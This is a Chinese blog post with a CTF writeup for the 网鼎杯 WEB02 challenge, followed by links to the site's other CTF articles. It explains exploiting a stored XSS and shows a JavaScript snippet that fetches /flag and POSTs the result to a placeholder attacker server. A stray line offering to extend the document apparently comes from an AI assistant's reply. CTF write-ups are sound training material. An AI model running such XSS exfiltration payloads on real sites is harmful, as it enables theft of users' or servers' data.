当前位置:首页 > CTF > 正文内容

网鼎杯 writeup

admin2天前CTF11

网鼎杯 writeup

writeup by XJUSEC 我想把回忆拼好给你

本文档来自新疆大学实验室(XJUSEC)的四位师傅:H1m、Coc、j3ff、xinyi

WEB 模块

WEB02

解题步骤

  1. 初始访问与登录分析

使用浏览器打开解题地址,页面显示登录框。测试发现:输入任意密码均可登录,但登录后页面会返回一个content_hash值(需记录该值,后续插入 JS 代码时需用到)。

辅助截图 1(登录页面与content_hash):

img

辅助截图 2(登录后页面细节):

img

  1. XSS 漏洞验证

在页面可输入代码的区域插入测试 JS 代码(如弹窗代码),刷新页面后成功触发弹窗,确认存在 XSS 漏洞。

基于 XSS 漏洞,可利用fetch API发送 HTTP 请求,进一步获取敏感信息。

辅助截图 3(XSS 漏洞验证与fetch API思路):

img

  1. 漏洞利用与 flag 获取

辅助截图 4(JS 脚本构造细节):

img

    • 扫描网站目录发现/flag路径,推测该路径存储 flag 内容;

    • 构造fetch请求:先通过fetch('/flag')向/flag发送请求,再用.then(response => response.text())将响应结果解析为文本(即 flag 内容);

    • 由于需将 flag 内容回传或展示,需额外构造第二个fetch请求,将解析后的文本内容发送到指定服务器(或页面可访问的存储位置)。

关键技术点说明

  • XSS 漏洞利用核心:通过页面输入框注入恶意 JS 代码,利用fetch API发起跨域或同域请求,获取服务器敏感资源(如/flag);

  • content_hash**的作用**:后续插入自定义 JS 脚本时,需携带该hash值以通过页面的基础校验,确保脚本正常执行;

  • fetch API**关键逻辑**:

// 核心思路代码(示例)
fetch('/flag')  // 向/flag发送请求
 .then(response => response.text())  // 将响应解析为文本(flag内容)
 .then(data => {
   // 第二个fetch:将flag内容发送到指定地址(如自己的服务器)
   fetch('http://你的服务器地址/接收flag', {
     method: 'POST',
     body: data  // 携带flag文本
   });
 });

若你后续需要补充 WEB02 题完整的 JS 脚本代码,或添加其他 WEB 题目的 writeup 内容,欢迎提供更多细节,我会进一步完善文档,让漏洞利用逻辑和解题步骤更完整。


扫描二维码推送至手机访问。

版权声明:本文由克拉玛依三十年社团发布,如需转载请注明出处。

本文链接:https://www.klmyssn.com/?id=77

分享给朋友:
返回列表

上一篇:网鼎杯 writeup

没有最新的文章了...

“网鼎杯 writeup” 的相关文章

(原创)全国中学生 CTF 平台规划 [CTF][中学生 CTF]

(原创)全国中学生 CTF 平台规划 [CTF][中学生 CTF]

一、成立平台原因在网络安全日益受到重视的今天,很多青少年涌入到这股浪潮之中去学习,同时不论是高校还是企业都会举办一些 CTF 竞赛,这些竞赛题型同样出现在网络空间安全自主招生机试题目中,这种现象的出现也导致很多过去的 OIer(信息学奥林匹克竞赛选手)以及其他方向的朋友转入了 CTF(信息安全对抗赛...

2017 ISG 管理运维赛(克拉玛依十三年团队)解题思路报告 V1.1

2017 ISG 管理运维赛(克拉玛依十三年团队)解题思路报告 V1.1

文档基础信息公司文档编号:SSN-17-09团队名称:克拉玛依 十三年(Karamay SSN)提交时间:2017 年 9 月声明本文档是高级中学十三年社团为 ISG 竞赛组委会、上海市信息安全行业协会提交的 ISG2017 解题文档,文档的所有权归十三年所有,任何对本文档的修改、发布、传播等行为都...

青少年论坛

青少年论坛

近期青少年论坛恢复,在论坛里可以交流技术,可以获得学习资源论坛注册如需加入论坛,可点击下方链接完成注册:点击注册...

(原创)i 春秋 CTF 大本营 basic 部分 writeup【i 春秋】【ctf writeup】【入门 ctf 题】

(原创)i 春秋 CTF 大本营 basic 部分 writeup【i 春秋】【ctf writeup】【入门 ctf 题】

题目链接: https://www.ichunqiu.com/battalion1. 回旋 13 踢解题思路题目中 “13” 为关键提示,对应ROT13 编码(凯撒密码的特殊形式,字母循环移位 13 位,A↔N、B↔O...Z↔M),直接对密文进行 ROT13 解码即可得到 flag。编码规则ROT...

Checkme1-8 WP

Checkme1-8 WP

checkme01核心代码:$keys = base64_decode(urldecode($keys));解题思路:需先对 “qsnctf” 字符进行 base64 编码,才能满足$keys=="qsnctf"的判断条件。操作步骤:将编码后的内容输入,即可获取 flag。che...

CTF 成长之路之青少年 CTF

CTF 成长之路之青少年 CTF

0x01 前言今天故事的起源是在一个偏远西北的小城市克拉玛依,由我为大家娓娓道来。0x02 故事开端(是故事的开端,不是你们看的开端)社团的建立下面引用来自「克拉玛依高级中学十三年社团」网站内容:“大概要追溯到我初中的时候吧。虽说很小的时候就十分喜欢计算机技术。但是都没有系统的学习,更没有志同道合的...